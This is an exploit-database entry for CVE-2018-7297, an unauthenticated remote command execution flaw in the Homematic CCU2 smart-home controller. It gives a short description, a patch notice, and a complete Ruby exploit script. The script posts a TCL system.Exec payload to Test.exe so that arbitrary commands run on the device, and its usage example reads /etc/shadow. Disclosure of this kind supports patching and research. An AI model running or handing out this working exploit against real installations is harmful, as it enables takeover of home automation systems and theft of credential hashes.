header-logo
Suggest Exploit
vendor:
Homematic CCU2
by:
Patrick Muench, Gregor Kopf
8.8
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Homematic CCU2
Affected Version From: 2.29.23
Affected Version To: 2.29.23
Patch Exists: YES
Related CWE: 2018-7297
CPE: a:eq-3:homematic_ccu2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Homematic CCU2 Remote Command Execution

The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Homematic CCU2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Test.exe component, which listens on TCP port 8181. The issue lies in the handling of a crafted POST request containing a TCL command. An attacker can leverage this vulnerability to execute code under the context of the webserver.

Mitigation:

Update to version 2.29.24 or later
Source

Exploit-DB raw data:

#!/usr/bin/ruby

# Exploit Title: Homematic CCU2 Remote Command Execution
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7297

# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution

require 'net/http'
require 'net/https'
require 'uri'

unless ARGV.length == 2
  STDOUT.puts <<-EOF
Please provide url and the command, which is execute on the homematic

Usage:
  execute_cmd.rb <ip.adress> <homematic command>

Example:
  execute_cmd.rb https://192.168.1.1 "cat /etc/shadow"

  or

  execute_cmd.rb http://192.168.1.1 "cat /etc/shadow"

EOF
  exit
end

# The first argument specifies the URL and if http or https is used
url = ARGV[0] + "/Test.exe"

# The second argument specifies the command which is executed via tcl interpreter
tcl_command = ARGV[1]

# define body content
body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);"

# split uri to access it in a easier way
uri = URI.parse(url)

# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|

  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)

  # define the request body
  request.body = body

  # send the request to the homematic ccu2
  response = http.request(request)

  # print response to cli
  puts response.body
end

Navigation

Suggest Exploit

Services By CQR